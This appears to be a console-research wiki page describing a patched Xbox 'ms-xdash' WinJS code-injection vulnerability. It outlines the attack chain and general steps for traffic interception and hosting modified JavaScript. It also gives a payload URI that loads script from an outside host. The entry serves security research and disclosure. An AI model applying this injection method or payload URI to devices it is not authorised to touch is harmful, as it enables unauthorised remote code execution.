Skip to content

MS Xdash WinJS injection

Metadata

Release date 22.12.2019
Author TitleOS
Classification RCE / WinJS code injection
Patched yes
Patch date ~2019/2020
First patched system version ?
Source https://blog.titleos.dev/xploring-xbox / https://github.com/TitleOS/ToastMyConsole
Download XboxOneResearch GIT

Info

The Xbox messaging system supports the embedding of protocols for one-click redemption of service messages containing 5x5 game codes, viewing shared images, club invites, etc. By crafting my own service message whilst chaining another vulnerability that allowed for remote custom WinJS execution (i.e. ToastMyConsole), I was able to construct a message allowing remote code execution on any console, given the stipulation of the user interacting and clicking on the button.

The worm-like behaviour is patched XBL server sided and not possible anymore.

The local code injection can still work on compatible Xbox OS versions, when a method for intercepting / modifying the network traffic is available.

In early versions, the vulnerable applications did not verify the domain name / protocol the payload link was pointing to, so it was possible to route to non-HTTPS or a different hostname.

The injected JS gets loaded in the background.

Prerequisites

  • Method to intercept / route HTTP/s traffic.

Instructions

No exact instructions are provided as the URLs to intercept reroute and their content vary between OS versions.

Basic info:

  1. Host a plain-http webserver (or SSL, if you have a valid/validly-spoofed certificate) somewhere reachable from the xbox.
  2. Download the original Javascript and store it on the webserver.
  3. Modify the javascript to give some indication of a successful loading/injection. Make sure to keep the basic structure intact (init-function(s) are found etc.)
  4. Rewrite the URL-payload to point to your custom JS.
  5. Open up the URI (f.e. from href-link) in MS Edge and see if it auto-switches to XDash.

Vulnerable protocol URIs: - ms-xdash:// (Xdash launcher) - ms-oobe:// (Xbox Assist / Welcome app)

Already modified

  • ToastMyConsole: ms-xdash://?payload=https://www.toastmyconsole.com/scripts/consoleinfo.js&state=""&webview=false

Original

  • ms-xdash://?payload=https://mediaexp-programming.xboxlive.com/Beacon/int/assets/js/beacon.app.min.js

NOTE: The respective app(s) can be found in X:\Apps\. Check the AppxManifest for their uap:Protocol.

Authors: tuxuser